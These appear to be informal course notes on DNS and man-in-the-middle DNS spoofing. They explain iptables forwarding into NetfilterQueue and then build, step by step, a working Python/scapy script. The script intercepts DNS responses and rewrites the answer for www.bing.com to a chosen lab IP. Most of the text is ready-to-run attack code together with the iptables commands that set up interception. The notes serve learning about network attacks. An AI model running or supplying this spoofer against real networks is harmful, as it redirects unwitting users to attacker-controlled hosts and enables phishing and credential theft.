#DNS SERVER
SERVER: A server is a computer LIKE U HAVE, the only difference is that it has more data/resources/programs...
EXPLANATION: If a user search facebook.com it will go to the DNS server and convert facebook.com to an IP address of the Facebook so that the computer can read and hence forth it go to the Facebook web-server and access the data and give to the user
#DNS SPOOFING: ROLE-OF-MITM
EXPLANATION: If a user search facebook.com it will go to the HACKER computer and HACKER can modify the IP with hs desire IP
#INTERCEPTING PACKET
IPTABLE: Simply put, iptables is a firewall program for Linux. It will monitor traffic from and to your server using tables. These tables contain sets of rules, called chains, that will filter incoming and outgoing data packets.
# RUN: iptables -I FORWARD -j NFQUEUE --queue-num 0
# TO CLEAR IP-TABLE:iptables --flush
# INSTALL NET-FILTER: pip install netfilterqueue
# CODE: /NOT/ALLOW INTERNET TO FLOW!/NET-CUT
- #!/usr/bin/env python
- import netfilterqueue
- def process_packet(packet):
- print(packet)
- packet.accept()
- queue = netfilterqueue.NetfilterQueue()
- queue.bind(0, process_packet)
- queue.run()
SO TO CONVERT PACKET INTO READABLE DATA WE USE
- #!/usr/bin/env python
- import netfilterqueue
- import scapy.all as scapy
- def process_packet(packet):
- scapy_packet = scapy.IP(packet.get_payload())
- print(scapy_packet.show())
- packet.accept()
- queue = netfilterqueue.NetfilterQueue()
- queue.bind(0, process_packet)
- queue.run()
- #!/usr/bin/env python
- import netfilterqueue
- import scapy.all as scapy
- def process_packet(packet):
- scapy_packet = scapy.IP(packet.get_payload())
- if scapy_packet.haslayer(scapy.DNSRR):
- print(scapy_packet.show())
- packet.accept()
- queue = netfilterqueue.NetfilterQueue()
- queue.bind(0, process_packet)
- queue.run()
- #!/usr/bin/env python
- import netfilterqueue
- import scapy.all as scapy
- def process_packet(packet):
- scapy_packet = scapy.IP(packet.get_payload())
- if scapy_packet.haslayer(scapy.DNSRR):
- qname = scapy_packet[scapy.DNSQR].qname
- if "www.bing.com" in qname:
- print("[+] Spoofing target")
- answer = scapy.DNSRR(rrname=qname, rdata="10.0.2.15")
- scapy_packet[scapy.DNS].an = answer
- scapy_packet[scapy.DNS].ancount = 1
- del scapy_packet[scapy.IP].len
- del scapy_packet[scapy.IP].chksum
- del scapy_packet[scapy.UDP].chksum
- del scapy_packet[scapy.UDP].len
- packet.set_payload(str(scapy_packet))
- packet.accept()
- queue = netfilterqueue.NetfilterQueue()
- queue.bind(0, process_packet)
- queue.run()